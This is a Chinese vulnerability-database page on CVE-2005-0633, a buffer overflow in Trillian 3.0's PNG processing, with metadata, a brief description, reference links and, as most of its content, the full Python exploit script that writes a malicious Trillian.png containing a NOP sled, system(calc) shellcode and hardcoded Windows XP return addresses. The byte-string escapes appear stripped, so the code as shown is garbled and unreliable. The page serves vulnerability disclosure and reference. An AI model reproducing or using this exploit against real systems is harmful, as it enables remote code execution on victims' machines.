Cerulean Studios Trillian 冲区溢出漏洞-安全小百科

Cerulean Studios Trillian 冲区溢出漏洞

漏洞ID	1108496	漏洞类型	缓冲区溢出
发布时间	2005-03-02	更新时间	2005-10-20
CVE编号	CVE-2005-0633	CNNVD-ID	CNNVD-200503-040
漏洞平台	Windows	CVSS评分	7.5

|漏洞来源

https://www.exploit-db.com/exploits/852
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200503-040

|漏洞详情

Trillian3.0及Pro3.0中存在缓冲区溢出，远程攻击者可以通过伪装PNG图像文件执行任意代码。

|漏洞EXP

##################################################################
#                                                                #
#               See-security Technologies ltd.                   #
#                                                                #
#                http://www.see-security.com                     #
#                                                                #
##################################################################
#                                                                #
#    Trillian 3.0 PNG Image Processing Buffer overflow Exploit   #
#                                                                #
#                                                                #
#            Discovered and coded by: Tal zeltzer                #
#                                                                #
##################################################################


import sys
import struct


# Addresses are compatible with Windows XP Service Pack 1
ReturnAddress = 0x77D7A145 # Address of "jmp esp" in ntdll.dll 
SystemAddress = 0x77C28044 # Address Of the system() function

# PNG Header
PngOfDeath  = "x89x50x4Ex47x0Dx0Ax1Ax0Ax00x00x00x0Dx49x48x44x52"
PngOfDeath += "x00x00x00x40x00x00x00x40x08x03x00x00x00x9DxB7x81"
PngOfDeath += "xECx00x00x01xB9x74x52x4Ex53"

# Nops
PngOfDeath += "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
PngOfDeath += "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
PngOfDeath += "x90x90x90x90x90x90x90x90x90"

# system(calc) shellcode
PngOfDeath += "x33xC0x50x68x63x61x6cx63x54x5bx50x53xb9"
PngOfDeath += struct.pack("<L",SystemAddress)
PngOfDeath += "xFFxD1"

# Junk Data
PngOfDeath += "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
PngOfDeath += "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
PngOfDeath += "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
PngOfDeath += "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
PngOfDeath += "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
PngOfDeath += "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
PngOfDeath += "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
PngOfDeath += "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
PngOfDeath += "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
PngOfDeath += "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
PngOfDeath += "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
PngOfDeath += "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
PngOfDeath += "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
PngOfDeath += "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

# Return Address
PngOfDeath += struct.pack("<L",ReturnAddress)

# Jump Back Shellcode
PngOfDeath += "x54x59xFExCDx89xE5xFFxE1"

# End Of File
PngOfDeath += "x90x90x90x59xE8x47xFExFFxFF"

fileOut = open("Trillian.png","wb")
fileOut.write(PngOfDeath)
fileOut.close()

# milw0rm.com [2005-03-02]

|参考资料

来源:BID
名称:12703
链接:http://www.securityfocus.com/bid/12703
来源:MISC
链接:http://www.securiteam.com/exploits/5KP030KF5E.html
来源:VUPEN
名称:ADV-2005-0221
链接:http://www.frsirt.com/english/advisories/2005/0221
来源:BUGTRAQ
名称:20050306See-securityadvisory:TrillianBasic3.0PNGProcessingBufferoverflow
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=111023000624809&w;=2

相关推荐: SnapFiles Whisper FTP Surfer Long File Name Remote Buffer Overflow Vulnerability

SnapFiles Whisper FTP Surfer Long File Name Remote Buffer Overflow Vulnerability 漏洞ID 1098188 漏洞类型 Boundary Condition Error 发布时间 2…

文章版权归作者所有，未经允许请勿转载。

THE END